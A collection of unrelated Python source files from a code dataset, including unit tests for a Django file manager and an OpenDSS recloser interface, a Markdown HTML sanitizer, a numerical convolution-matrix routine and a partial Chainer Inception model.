'cache.queryResultCache.hitratio': 0.66,
'cache.queryResultCache.inserts': 1,
'cache.queryResultCache.evictions': 0,
'cache.queryResultCache.size': 1,
'cache.queryResultCache.warmupTime': 0,
'cache.queryResultCache.cumulative_lookups': 3,
'cache.queryResultCache.cumulative_hits': 2,
'cache.queryResultCache.cumulative_hitratio': 0.66,
'cache.queryResultCache.cumulative_inserts': 1,
'cache.queryResultCache.cumulative_evictions': 0,
'jvm.mem.free': 42.7,
'jvm.mem.total': 61.9,
'jvm.mem.max': 185.6,
'jvm.mem.used': 19.2,
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics)
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_fail_gracefully(self, publish_mock):
urlopen_mock = patch('urllib2.urlopen', Mock(
return_value=self.getFixture('stats_blank')))
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
self.assertPublishedMany(publish_mock, {})
##########################################################################
if __name__ == "__main__":
unittest.main()
|
StarcoderdataPython
|
8056765
|
<gh_stars>10-100
import jsonschema
import kayvee
import logging
schema = {
"type": "object",
"name": "Volume backup schedule",
"properties": {
"max_snapshots": {"type": "number"},
"interval": {"type": "string"},
"name": {"type": "string"},
},
"additionalProperties": False,
}
class BackupConfig:
"""
Interface shared by backup configs
Config items are dicts, with key equal to the volume id mapped to a dict of
parameters
{
"vol-1234567" : {
"interval": "daily",
"max_snapshots": 7,
"name": "events-db",
...
},
...
}
"""
path = None
@classmethod
def _validate_config(cls, new_config):
""" Raises exception if config loaded from file doesn't match expected schema """
assert type(new_config) is dict
for key, val in new_config.iteritems():
jsonschema.validate(val, schema)
def get(self):
""" Get a dict of config items """
try:
new_config = self.refresh()
self._validate_config(new_config)
self.config = new_config
except Exception as e:
logging.warning(kayvee.formatLog("ebs-snapshots", "warning", "unable to load backup config", {"path": self.path, "error": str(e)}))
return self.config
def refresh(self):
""" returns config dict, after being updated """
raise NotImplementedError("refresh() must be implemented in subclasses")
|
StarcoderdataPython
|
3326336
|
from unittest.mock import patch, mock_open
from django.test import TestCase
# Import module
from backend.file_manager import *
METADATA_EXAMPLE = "59°23'19.2\"N 17°55'35.4\"E (59.388668, 17.926501)\n2018-09-06 15:45:59.603 " \
"(2018-09-06 15:45:59)\n(Test camera name)"
class GetSourceFolders(TestCase):
def setUp(self) -> None:
"""
Set up a complex file structure.
"""
self.rf = Folder.objects.create(path='home/user/', name='test_folder')
self.sf = Folder.objects.create(path='home/user/test_folder/', name='test_subfolder')
self.p = Project.objects.create(name="test_project")
@patch('backend.file_manager.get_subfolders_to_entries')
def test_basic_call(self, mock_get_subfolders_to_entries):
"""
Test simple call.
"""
mock_get_subfolders_to_entries.return_value = [self.sf]
code, res = get_source_folders(data={PROJECT_ID: self.p.id})
mock_get_subfolders_to_entries.assert_called_once()
self.assertEqual(code, 200)
self.assertEqual(len(res[FOLDERS]), 1)
self.assertEqual(len(res[FOLDER_IDS]), 0)
class GetFoldersTest(TestCase):
def setUp(self) -> None:
"""
Set up a complex file structure.
"""
self.rf = Folder.objects.create(path='home/user/', name='test_folder')
self.sf = Folder.objects.create(path='home/user/test_folder/', name='test_subfolder')
@patch('backend.file_manager.get_subfolders_recursive')
@patch('backend.file_manager.get_folders_in_project')
def test_basic_call(self, mock_get_folders_in_project, mock_get_subfolders_recursive):
"""
Test with a complex file structure.
"""
mock_get_folders_in_project.return_value = [self.rf]
mock_get_subfolders_recursive.return_value = [self.sf]
code, res = get_folders(data={PROJECT_ID: 1})
mock_get_folders_in_project.assert_called_once_with(pid=1)
mock_get_subfolders_recursive.assert_called_once_with(fid=self.rf.id)
self.assertEqual(code, 200)
self.assertEqual(len(res[FOLDERS]), 2)
@patch('backend.file_manager.get_subfolders_recursive')
@patch('backend.file_manager.get_folders_in_project')
def test_redundant_parameter(self, mock_get_folders_in_project, mock_get_subfolders_recursive):
"""
Test with a redundant parameter.
"""
mock_get_folders_in_project.return_value = [self.rf]
mock_get_subfolders_recursive.return_value = [self.sf]
code, res = get_folders(data={PROJECT_ID: 1, FOLDER_ID: 42})
mock_get_folders_in_project.assert_called_once_with(pid=1)
mock_get_subfolders_recursive.assert_called_once_with(fid=self.rf.id)
self.assertEqual(code, 200)
self.assertEqual(len(res[FOLDERS]), 2)
def test_missing_parameter(self):
"""
Test with a missing parameter.
"""
code, res = get_folders(data={FOLDER_ID: 42})
self.assertEqual(code, 400)
self.assertEqual(res, {})
def test_non_existing_project(self):
"""
Test with a project id that doesn't exist.
"""
code, res = get_folders(data={PROJECT_ID: 42})
self.assertEqual(code, 204)
self.assertEqual(res, {})
class AddFoldersTest(TestCase):
@patch('backend.file_manager.get_source_folders')
@patch('backend.file_manager.add_folder_to_project')
def test_simple_call(self, mock_add_folder_to_project, mock_get_source_folders):
"""
Test adding a folder to a project.
"""
res = add_folder({PROJECT_ID: 42, FOLDER_ID: 1337})
mock_add_folder_to_project.assert_called_once_with(fid=1337, pid=42)
mock_get_source_folders.assert_called_once_with(data={PROJECT_ID: 42, FOLDER_ID: 1337})
self.assertEqual(res, mock_get_source_folders.return_value)
def test_missing_parameter(self):
"""
Test with a missing parameter.
"""
code, res = add_folder({FOLDER_ID: 1337})
self.assertEqual(code, 400)
self.assertEqual(res, {})
class RemoveFoldersTest(TestCase):
@patch('backend.file_manager.get_source_folders')
@patch('backend.file_manager.delete_folder_from_project')
def test_simple_call(self, mock_delete_folder_from_project, mock_get_source_folders):
"""
Test removing a folder to a project.
"""
res = remove_folder({PROJECT_ID: 42, FOLDER_ID: 1337})
mock_delete_folder_from_project.assert_called_once_with(fid=1337, pid=42)
mock_get_source_folders.assert_called_once_with(data={PROJECT_ID: 42, FOLDER_ID: 1337})
self.assertEqual(res, mock_get_source_folders.return_value)
def test_missing_parameter(self):
"""
Test with a missing parameter.
"""
code, res = remove_folder({FOLDER_ID: 1337})
self.assertEqual(code, 400)
self.assertEqual(res, {})
class GetClipsTest(TestCase):
def setUp(self) -> None:
"""
Set up a file structure.
"""
self.resolution = Resolution.objects.get_or_create(width=256, height=240)[0]
self.cm_name = 'Test camera name'
self.lon = Decimal('0.42')
self.lat = Decimal('42.0')
self.st = timezone.datetime(2020, 1, 17, tzinfo=pytz.timezone(settings.TIME_ZONE))
self.et = timezone.datetime(2020, 1, 18, tzinfo=pytz.timezone(settings.TIME_ZONE))
self.rf = Folder.objects.create(path='home/user/', name='test_folder')
self.ca = Camera.objects.create(name=self.cm_name, longitude=self.lon, latitude=self.lat)
self.cl = Clip.objects.create(folder=self.rf, name='test_clip', video_format='mkv', start_time=self.st,
end_time=self.et, camera=self.ca, frame_rate=42.0, resolution=self.resolution)
@patch('backend.file_manager.get_all_clips_in_project')
def test_basic_call(self, mock_get_all_clips_in_project):
"""
Test with a complex file structure.
"""
mock_get_all_clips_in_project.return_value = [self.cl]
code, res = get_clips(data={PROJECT_ID: 1})
mock_get_all_clips_in_project.assert_called_once_with(pid=1)
self.assertEqual(code, 200)
self.assertEqual(len(res[CLIPS]), 1)
def test_missing_parameter(self):
"""
Test with a missing parameter.
"""
code, res = get_clips(data={})
self.assertEqual(code, 400)
self.assertEqual(res, {})
def test_non_existing_project(self):
"""
Test with a project id that doesn't exist.
"""
code, res = get_clips(data={PROJECT_ID: 42})
self.assertEqual(code, 204)
self.assertEqual(res, {})
class GetFilesTest(TestCase):
@patch('backend.file_manager.get_clips')
@patch('backend.file_manager.get_folders')
def test_basic_call(self, mock_get_folders, mock_get_clips):
"""
Test that get_folders and get_clips are called.
"""
mock_get_folders.return_value = (200, {})
mock_get_clips.return_value = (200, {})
get_files(data={PROJECT_ID: 42})
mock_get_folders.assert_called_once_with(data={PROJECT_ID: 42})
mock_get_clips.assert_called_once_with(data={PROJECT_ID: 42})
class BuildFileStructureTest(TestCase):
@patch('backend.file_manager.create_root_folder')
@patch('backend.file_manager.traverse_subfolders')
@patch('backend.file_manager.os.path.isdir')
@patch('backend.file_manager.os.path.dirname')
@patch('backend.file_manager.os.path.basename')
def test_function(self, mock_basename, mock_dirname, mock_isdir, mock_traverse_subfolders, mock_create_root_folder):
"""
Test that a function for create_root_folder and traverse_folder is called with appropriate arguments.
"""
mock_basename.return_value = 'test_folder'
mock_dirname.return_value = 'home/user'
mock_isdir.return_value = True
mock_traverse_subfolders.return_value = None
mock_create_root_folder.return_value = 1337
build_file_structure('home/user/test_folder')
mock_isdir.assert_called_once_with('home/user/test_folder')
mock_create_root_folder.assert_called_once_with(path='home/user/', name='test_folder')
mock_traverse_subfolders.assert_called_once_with(path='home/user/test_folder', parent_id=1337)
class TraverseSubfoldersTest(TestCase):
# Hard to test because behavior is dependent on OS.
@patch('os.scandir')
def test_function(self, mock_os_scandir):
"""
Test that scandir is called with correct argument.
"""
mock_os_scandir.return_value = []
traverse_subfolders(path='home/user/test_folder', parent_id=1337)
mock_os_scandir.assert_called_with('home/user/test_folder')
class AnalyzeFileTest(TestCase):
def test_get_name(self):
"""
Test getting the name from a file (str).
"""
self.assertEqual(analyze_file(file='filename.suffix')[1], 'filename')
def test_get_suffix(self):
"""
Test getting the suffix from a file (str).
"""
self.assertEqual(analyze_file(file='filename.suffix')[2], 'suffix')
def test_bad_file(self):
"""
Test that ValueError is raised when a bad file is given.
"""
self.assertRaises(ValueError, analyze_file, file='filename_no_suffix')
def test_is_clip(self):
"""
Test checking if a file is a clip.
"""
for vf in VIDEO_FORMATS:
self.assertTrue(analyze_file(file='filename.{0}'.format(vf))[0])
self.assertFalse(analyze_file(file='filename.fake')[0])
class GetClipInfoTest(TestCase):
def setUp(self) -> None:
self.cm_name = 'Test camera name'
self.lat = Decimal('42.0')
self.lon = Decimal('0.42')
self.st = timezone.datetime(year=2018, month=9, day=6, hour=15, minute=45, second=59,
tzinfo=pytz.timezone(settings.TIME_ZONE))
self.et = timezone.datetime(year=2018, month=9, day=6, hour=15, minute=46, second=41,
tzinfo=pytz.timezone(settings.TIME_ZONE)) # duration = 42
@patch('backend.file_manager.get_clip_details')
@patch('backend.file_manager.parse_metadata')
def test_valid_clip(self, mock_parse_metadata, mock_get_clip_details):
"""
Test with valid clip.
"""
mock_parse_metadata.return_value = (self.lat, self.lon, self.st, self.cm_name)
mock_get_clip_details.return_value = (42, 1337, 256, 240)
res = get_clip_info(file_path='home/user/test_folder/test_clip.avi', folder_id=1337, name='test_clip',
video_format='avi')
self.assertEqual(res, {'fid': 1337, 'clip_name': 'test_clip', 'video_format': 'avi', 'start_time': self.st,
'end_time': self.et, 'latitude': self.lat, 'longitude': self.lon, 'width': 256,
'height': 240, 'frame_rate': 1337, 'camera_name': 'Test camera name'})
def test_non_existing_clip(self):
"""
Test with non existing clip.
"""
self.assertRaises(FileNotFoundError, get_clip_info, file_path='home/user/test_folder/test_clip.avi',
folder_id=1337, name='test_clip', video_format='avi')
class ParseMetadataTest(TestCase):
@patch('builtins.open', new_callable=mock_open, read_data=METADATA_EXAMPLE)
def test_with_example_data(self, mock_file):
"""
Test parsing an example metadata file.
"""
lat, lon, st, cm_name = parse_metadata(file_path='home/user/test_folder/test_clip.avi')
self.assertEqual(lat, Decimal('59.388668'))
self.assertEqual(lon, Decimal('17.926501'))
self.assertEqual(st, timezone.datetime(year=2018, month=9, day=6, hour=15, minute=45, second=59,
tzinfo=pytz.timezone(settings.TIME_ZONE)))
self.assertEqual(cm_name, 'Test camera name')
mock_file.assert_called_once_with(file='home/user/test_folder/test_clip.avi.txt', errors='ignore', mode='r')
def test_non_existing_file(self):
"""
Test parsing a non existing file. Should give FileNotFoundError.
"""
self.assertRaises(FileNotFoundError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
@patch('builtins.open', new_callable=mock_open, read_data=METADATA_EXAMPLE + "\nBAD DATA (1337, 42)")
def test_extra_parenthesis_in_metadata(self, mock_file):
"""
Test parsing metadata with extra parentheses. Should give ValueError.
"""
self.assertRaises(ValueError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
@patch('builtins.open', new_callable=mock_open, read_data="2018-09-06 15:45:59.603 (2018-09-06 15:45:59)"
"59°23'19.2\"N 17°55'35.4\"E (59.388668, 17.926501)"
"\n(Test camera name)")
def test_wrong_order_of_metadata(self, mock_file):
"""
Test parsing metadata with location and time in reversed order. Should give ValueError.
"""
self.assertRaises(ValueError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
@patch('builtins.open', new_callable=mock_open, read_data="59°23'19.2\"N 17°55'35.4\"E (59.38, 17.9, 42.0)\n"
"2018-09-06 15:45:59.603 (2018-09-06 15:45:59)\n"
"(Test camera name)")
def test_extra_location_value_of_metadata(self, mock_file):
"""
Test parsing metadata. Should give ValueError.
"""
self.assertRaises(ValueError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
@patch('builtins.open', new_callable=mock_open, read_data="59°23'19.2\"N 17°55'35.4\"E (59.388668, 17.926501)\n"
"2018-09-06 25:45:59.603 (2018-09-06 25:45:59)\n"
"(Test camera name)")
def test_wrong_datetime_format(self, mock_file):
"""
Test parsing metadata. Should give ValueError.
"""
self.assertRaises(ValueError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
@patch('builtins.open', new_callable=mock_open, read_data="59°23'19.2\"N 17°55'35.4\"E (59.388668, 17.926501)\n"
"2018-09-06 25:45:59.603 (2018-09-06 25:45:59)")
def test_missing_camera_name(self, mock_file):
"""
Test parsing metadata. Should give ValueError.
"""
self.assertRaises(ValueError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
def cap_get(x):
"""
Function used to mimic the behaviour of VideoCapture.get.
:param x: Given argument.
"""
if x == cv2.CAP_PROP_FPS:
return 42
elif x == cv2.CAP_PROP_FRAME_COUNT:
return 1337.0
elif x == cv2.CAP_PROP_FRAME_WIDTH:
return 256
elif x == cv2.CAP_PROP_FRAME_HEIGHT:
return 240
class GetClipDetailsTest(TestCase):
@patch('backend.file_manager.os.path.isfile')
@patch('backend.file_manager.cv2.VideoCapture')
def test_valid_clip(self, mock_cap, mock_isfile):
"""
Test getting details of a clip. Should round down for duration.
"""
mock_isfile.return_value = True
mock_cap.return_value.get.side_effect = cap_get
self.assertEqual(get_clip_details('home/user/test_folder/test_clip.avi'), (31, 42, 256, 240))
mock_cap.assert_called_once_with('home/user/test_folder/test_clip.avi')
def test_non_existing_clip(self):
"""
Test calling function with non existing clip.
"""
self.assertRaises(FileNotFoundError, get_clip_details, file_path='home/user/test_folder/no_clip.avi')
|
StarcoderdataPython
|
3218619
|
<reponame>davilamds/py_dss_interface<filename>tests/py_dss_interface/test_reclosers.py
# -*- coding: utf-8 -*-
# @Time : 09/07/2021 02:16 AM
# @Author : <NAME>
# @Email : <EMAIL>
# @File : test_reclosers.py
# @Software : VSCode
import pytest
class TestReclosers13Bus:
@pytest.fixture(autouse=True)
def _request(self, solve_snap_13bus):
self.dss = solve_snap_13bus
self.dss.text(r"New 'Recloser.cb1' MonitoredObj=Line.650632 "
r"MonitoredTerm=1 "
r"NumFast=4 "
r"PhaseFast=Ext_Inv "
r"PhaseDelayed=Ext_Inv "
r"PhaseTrip=800 "
r"TDPhFast=1 "
r"TDPhDelayed=1 "
r"PhaseInst=2400 "
r"GroundFast=Ext_Inv "
r"GroundDelayed=Ext_Inv "
r"GroundTrip=800 "
r"TDGrFast=1 "
r"TDGrDelayed=1 "
r"GroundInst=1200 "
r"Shots=4 "
r"RecloseIntervals=(0.5, 2, 2, )")
self.dss.text(r"New 'Recloser.cb2' MonitoredObj=Line.684611 "
r"MonitoredTerm=2 "
r"NumFast=4 "
r"PhaseFast=Ext_Inv "
r"PhaseDelayed=Ext_Inv "
r"PhaseTrip=800 "
r"TDPhFast=1 "
r"TDPhDelayed=1 "
r"PhaseInst=2400 "
r"GroundFast=Ext_Inv "
r"GroundDelayed=Ext_Inv "
r"GroundTrip=800 "
r"TDGrFast=1 "
r"TDGrDelayed=1 "
r"GroundInst=1200 "
r"Shots=4 "
r"RecloseIntervals=(0.5, 2, 2, )")
self.dss.solution_solve()
self.dss.reclosers_write_name('cb1')
# ===================================================================
# Integer methods
# ===================================================================
def test_reclosers_count(self):
expected = 2
actual = self.dss.reclosers_count()
assert expected == actual
def test_reclosers_first(self):
expected = 1
actual = self.dss.reclosers_first()
assert expected == actual
def test_reclosers_next(self):
expected = 2
actual = self.dss.reclosers_next()
assert expected == actual
def test_reclosers_read_monitored_term(self):
expected = 1
actual = self.dss.reclosers_read_monitored_term()
assert expected == actual
def test_reclosers_write_monitored_term(self):
expected = 2
self.dss.reclosers_write_monitored_term(expected)
actual = self.dss.reclosers_read_monitored_term()
assert expected == actual
def test_reclosers_read_switched_term(self):
expected = 1
actual = self.dss.reclosers_read_switched_term()
assert expected == actual
def test_reclosers_write_switched_term(self):
expected = 2
self.dss.reclosers_write_switched_term(expected)
actual = self.dss.reclosers_read_switched_term()
assert expected == actual
def test_reclosers_read_num_fast(self):
expected = 4
actual = self.dss.reclosers_read_num_fast()
assert expected == actual
def test_reclosers_write_num_fast(self):
expected = 1
self.dss.reclosers_write_num_fast(expected)
actual = self.dss.reclosers_read_num_fast()
assert expected == actual
def test_reclosers_read_shots(self):
expected = 4
actual = self.dss.reclosers_read_shots()
assert expected == actual
def test_reclosers_write_shots(self):
expected = 3
self.dss.reclosers_write_shots(expected)
actual = self.dss.reclosers_read_shots()
assert expected == actual
def test_reclosers_open(self):
expected = 0
actual = self.dss.reclosers_open()
assert expected == actual
def test_reclosers_close(self):
expected = 0
actual = self.dss.reclosers_close()
assert expected == actual
def test_reclosers_read_idx(self):
expected = 1
actual = self.dss.reclosers_read_idx()
assert expected == actual
def test_reclosers_write_idx(self):
expected = 2
self.dss.reclosers_write_idx(expected)
actual = self.dss.reclosers_read_idx()
assert expected == actual
# ===================================================================
# Float methods
# ===================================================================
def test_reclosers_read_phase_trip(self):
expected = 800
actual = self.dss.reclosers_read_phase_trip()
assert expected == actual
def test_reclosers_write_phase_trip(self):
expected = 700
self.dss.reclosers_write_phase_trip(expected)
actual = self.dss.reclosers_read_phase_trip()
assert expected == actual
def test_reclosers_read_phase_inst(self):
expected = 2400
actual = self.dss.reclosers_read_phase_inst()
assert expected == actual
def test_reclosers_write_phase_inst(self):
expected = 1200
self.dss.reclosers_write_phase_inst(expected)
actual = self.dss.reclosers_read_phase_inst()
assert expected == actual
def test_reclosers_read_ground_trip(self):
expected = 800
actual = self.dss.reclosers_read_ground_trip()
assert expected == actual
def test_reclosers_write_ground_trip(self):
expected = 700
self.dss.reclosers_write_ground_trip(expected)
actual = self.dss.reclosers_read_ground_trip()
assert expected == actual
def test_reclosers_read_ground_inst(self):
expected = 1200
actual = self.dss.reclosers_read_ground_inst()
assert expected == actual
def test_reclosers_write_ground_inst(self):
expected = 1900
self.dss.reclosers_write_ground_inst(expected)
actual = self.dss.reclosers_read_ground_inst()
assert expected == actual
# ===================================================================
# String methods
# ===================================================================
def test_reclosers_read_name(self):
expected = 'cb1'
actual = self.dss.reclosers_read_name()
assert expected == actual
def test_reclosers_write_name(self):
expected = 'cb2'
self.dss.reclosers_write_name(expected)
actual = self.dss.reclosers_read_name()
assert expected == actual
def test_reclosers_read_monitored_obj(self):
expected = 'line.650632'
actual = self.dss.reclosers_read_monitored_obj()
assert expected == actual
def test_reclosers_write_monitored_obj(self):
expected = 'line.684652'
self.dss.reclosers_write_monitored_obj(expected)
actual = self.dss.reclosers_read_monitored_obj()
assert expected == actual
def test_reclosers_read_switched_obj(self):
expected = 'line.650632'
actual = self.dss.reclosers_read_switched_obj()
assert expected == actual
def test_reclosers_write_switched_obj(self):
expected = 'line.684652'
self.dss.reclosers_write_switched_obj(expected)
actual = self.dss.reclosers_read_switched_obj()
assert expected == actual
# ===================================================================
# Variant methods
# ===================================================================
def test_reclosers_all_names(self):
expected = ['cb1', 'cb2']
actual = self.dss.reclosers_all_names()
assert expected == actual
def test_reclosers_reclose_intervals(self):
expected = [0.5, 2, 2]
actual = self.dss.reclosers_reclose_intervals()
assert expected == actual
|
StarcoderdataPython
|
8078907
|
import os
import numpy as np
import torch
import torch.nn as nn
try:
dictionary = np.load('grid_embedding.npy').item()
print "[Dictionary] Loading Existing Embedding Dictionary"
except IOError as e:
dictionary = {'new':-1}
print "[Dictionary] Building New Word Embedding Dictionary"
#word = ['hello','world','everyone','good','morning','new','world2','good','bad','good','ki']
word = ['ello','wod','evne','od','morn','new','wod2','gd','bad','good','ki']
word = ['el','wo','vne','o','mon','nw','wod2','gd','bad','go','ki']
dictionary_size=100
for i in range(0,11):
if dictionary.get(word[i],-1) == -1:
dictionary.update({word[i]:float((len(dictionary)+1))/dictionary_size})
print word[i]
print dictionary[word[i]]
#FT=torch.FloatTensor([dictionary[word[i]]]).new_full()
expand = np.full((10,10),dictionary[word[i]])
tensor_expand = torch.from_numpy(expand)
print tensor_expand
np.save('grid_embedding.npy',dictionary)
print dictionary
|
StarcoderdataPython
|
6444555
|
"""
Content rendering functionality
Note that this module is designed to imitate the front end behavior as
implemented in Markdown.Sanitizer.js.
"""
import re
import markdown
# These patterns could be more flexible about things like attributes and
# whitespace, but this is imitating Markdown.Sanitizer.js, so it uses the
# patterns defined therein.
TAG_PATTERN = re.compile(r"<[^>]*>?")
SANITIZED_TAG_PATTERN = re.compile(r"<(/?)(\w+)[^>]*>")
ALLOWED_BASIC_TAG_PATTERN = re.compile(
r"^(</?(b|blockquote|code|del|dd|dl|dt|em|h1|h2|h3|i|kbd|li|ol|p|pre|s|sup|sub|strong|strike|ul)>|<(br|hr)\s?/?>)$"
)
ALLOWED_A_PATTERN = re.compile(
r'^(<a\shref="((https?|ftp)://|/)[-A-Za-z0-9+&@#/%?=~_|!:,.;\(\)]+"(\stitle="[^"<>]+")?\s?>|</a>)$'
)
ALLOWED_IMG_PATTERN = re.compile(
r'^(<img\ssrc="(https?://|/)[-A-Za-z0-9+&@#/%?=~_|!:,.;\(\)]+"(\swidth="\d{1,3}")?'
r'(\sheight="\d{1,3}")?(\salt="[^"<>]*")?(\stitle="[^"<>]*")?\s?/?>)$'
)
def _sanitize_tag(match):
"""Return the tag if it is allowed or the empty string otherwise"""
tag = match.group(0)
if (
ALLOWED_BASIC_TAG_PATTERN.match(tag) or
ALLOWED_A_PATTERN.match(tag) or
ALLOWED_IMG_PATTERN.match(tag)
):
return tag
else:
return ""
def _sanitize_html(source):
"""
Return source with all non-allowed tags removed, preserving the text content
"""
return TAG_PATTERN.sub(_sanitize_tag, source)
def _remove_unpaired_tags(source):
"""
Return source with all unpaired tags removed, preserving the text content
source should have already been sanitized
"""
tag_matches = list(SANITIZED_TAG_PATTERN.finditer(source))
if not tag_matches:
return source
tag_stack = []
tag_name_stack = []
text_stack = [source[:tag_matches[0].start()]]
for i, match in enumerate(tag_matches):
tag_name = match.group(2)
following_text = (
source[match.end():tag_matches[i + 1].start()] if i + 1 < len(tag_matches) else
source[match.end():]
)
if tag_name in ["p", "img", "br", "li", "hr"]: # tags that don't require closing
text_stack[-1] += match.group(0) + following_text
elif match.group(1): # end tag
if tag_name in tag_name_stack: # paired with a start tag somewhere
# pop tags until we find the matching one, keeping the non-tag text
while True:
popped_tag_name = tag_name_stack.pop()
popped_tag = tag_stack.pop()
popped_text = text_stack.pop()
if popped_tag_name == tag_name:
text_stack[-1] += popped_tag + popped_text + match.group(0)
break
else:
text_stack[-1] += popped_text
# else unpaired; drop the tag
text_stack[-1] += following_text
else: # start tag
tag_stack.append(match.group(0))
tag_name_stack.append(tag_name)
text_stack.append(following_text)
return "".join(text_stack)
def render_body(raw_body):
"""
Render raw_body to HTML.
This includes the following steps:
* Convert Markdown to HTML
* Strip non-whitelisted HTML
* Remove unbalanced HTML tags
Note that this does not prevent Markdown syntax inside a MathJax block from
being processed, which the forums JavaScript code does.
"""
rendered = markdown.markdown(raw_body)
rendered = _sanitize_html(rendered)
rendered = _remove_unpaired_tags(rendered)
return rendered
|
StarcoderdataPython
|
5034476
|
from django.test import TestCase
from django.conf import settings
import json
import time
import os
from newt.tests import MyTestClient, newt_base_url, login
try:
from newt.local_settings import test_machine as machine
except ImportError:
machine = "localhost"
class JobTests(TestCase):
fixtures = ["test_fixture.json"]
def setUp(self):
self.client = MyTestClient()
self.client.post(newt_base_url + "/auth", data=login)
def test_get_queues(self):
# Tests getting queues
r = self.client.get(newt_base_url + "/job/")
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertTrue(len(json_response['output']) > 0)
self.assertIn(machine, json_response['output'].keys())
def test_running_cmds(self):
# Tests submitting a job
payload = {
"jobscript": "/bin/hostname\nsleep 10"
}
r = self.client.post(newt_base_url + "/job/"+machine+"/", data=payload)
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertIsNot(json_response['output']['jobid'], None)
# Get job id from submitting the job
job_id = json_response['output']['jobid']
# Give the process time to register
time.sleep(1)
# Tests getting job info
r = self.client.get(newt_base_url + "/job/"+machine+"/%s/" % job_id)
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['jobid'], job_id)
self.assertEquals(json_response['output']['user'], login['username'])
# Delete job from queue
r = self.client.delete(newt_base_url + "/job/"+machine+"/%s/" % job_id)
self.assertEquals(r.status_code, 200)
|
StarcoderdataPython
|
384567
|
import numpy as np
def convmat2D(A, P, Q):
'''
:param A: input is currently whatever the real space representation of the structure is
:param P: Pspecifies max order in x (so the sum is from -P to P
:param Q: specifies max order in y (so the sum is from -Q to Q
:return:
'''
N = A.shape;
NH = (2*P+1) * (2*Q+1) ;
p = list(range(-P, P + 1)); #array of size 2Q+1
q = list(range(-Q, Q + 1));
## do fft
Af = (1 / np.prod(N)) * np.fft.fftshift(np.fft.fft2(A));
# natural question is to ask what does Af consist of..., what is the normalization for?
## NOTE: indexing error; N[0] actually corresponds to y and N[1] corresponds to x.
# central indices marking the (0,0) order
p0 = int((N[1] / 2)); #Af grid is Nx, Ny
q0 = int((N[0] / 2)); #no +1 offset or anything needed because the array is orders from -P to P
C = np.zeros((NH, NH))
C = C.astype(complex);
for qrow in range(2*Q+1): #remember indices in the arrary are only POSITIVE
for prow in range(2*P+1): #outer sum
# first term locates z plane, 2nd locates y column, prow locates x
row = (qrow) * (2*P+1) + prow; #natural indexing
for qcol in range(2*Q+1): #inner sum
for pcol in range(2*P+1):
col = (qcol) * (2*P+1) + pcol; #natural indexing
pfft = p[prow] - p[pcol]; #get index in Af; #index may be negative.
qfft = q[qrow] - q[qcol];
C[row, col] = Af[q0 + pfft, p0 + qfft]; #index may be negative.
return C;
def convmat2D_o(A, P, Q):
'''
:param A: input is currently whatever the real space representation of the structure is
:param P: Pspecifies total number of orders
:param Q:
:return:
'''
N = A.shape;
NH = P*Q ;
p = list(range(-int(P/2), int(P/2) + 1));
q = list(range(-int(Q/2), int(Q/2) + 1));
## do fft
Af = (1 / np.prod(N)) * np.fft.fftshift(np.fft.fftn(A));
# natural question is to ask what does Af consist of..., what is the normalization for?
# central indices marking the (0,0) order
p0 = int(np.floor(N[0] / 2)); #Af grid is Nx, Ny
q0 = int(np.floor(N[1] / 2)); #we have to do minus 1 because indices are from 0 to N-1 for N element arrays
C = np.zeros((NH, NH))
C = C.astype(complex);
for qrow in range(Q): #remember indices in the arrary are only POSITIVE
for prow in range(P): #outer sum
# first term locates z plane, 2nd locates y column, prow locates x
row = (qrow) * (P) + prow; #natural indexing
for qcol in range(Q): #inner sum
for pcol in range(P):
col = (qcol) * (P) + pcol; #natural indexing
pfft = p[prow] - p[pcol];
qfft = q[qrow] - q[qcol];
C[row, col] = Af[p0 + pfft, q0 + qfft];
return C;
|
StarcoderdataPython
|
11314010
|
<gh_stars>10-100
#Modified from https://github.com/hvy/chainer-inception-score
import math
import chainer
from chainer import Chain
from chainer import functions as F
from chainer import links as L
from chainer import Variable
from chainer.functions.activation.relu import ReLU
from chainer.functions.pooling.average_pooling_2d import AveragePooling2D
from chainer.functions.pooling.max_pooling_2d import MaxPooling2D
class Mixed(Chain):
def __init__(self, trunk):
super().__init__()
for name, link in trunk:
self.add_link(name, link)
self.trunk = trunk
def __call__(self, x):
hs = []
#print(type(x))
for name, f in self.trunk:
if not name.startswith('_'):
if 'bn' in name:
h = getattr(self, name)(x)
else:
h = getattr(self, name)(x)
else:
h = f.apply((x,))[0]
hs.append(h)
return F.concat(hs)
class Tower(Chain):
def __init__(self, trunk):
super().__init__()
for name, link in trunk:
if not name.startswith('_'):
self.add_link(name, link)
self.trunk = trunk
def __call__(self, x):
h = x
for name, f in self.trunk:
if not name.startswith('_'): # Link
if 'bn' in name:
h = getattr(self, name)(h)
else:
h = getattr(self, name)(h)
else: # AveragePooling2D, MaxPooling2D or ReLU
h = f.apply((h,))[0]
return h
class Inception(Chain):
def __init__(self):
super().__init__(
conv=L.Convolution2D(3, 32, 3, stride=2, pad=0),
conv_1=L.Convolution2D(32, 32, 3, stride=1, pad=0),
conv_2=L.Convolution2D(32, 64, 3, stride=1, pad=1),
conv_3=L.Convolution2D(64, 80, 1, stride=1, pad=0),
conv_4=L.Convolution2D(80, 192, 3, stride=1, pad=0),
bn_conv=L.BatchNormalization(32),
bn_conv_1=L.BatchNormalization(32),
bn_conv_2=L.BatchNormalization(64),
bn_conv_3=L.BatchNormalization(80),
bn_conv_4=L.BatchNormalization(192),
mixed=Mixed([
('conv', Tower([
('conv', L.Convolution2D(192, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(192, 48, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(48)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(48, 64, 5, stride=1, pad=2)),
('bn_conv_1', L.BatchNormalization(64)),
('_relu_1', ReLU())
])),
('tower_1', Tower([
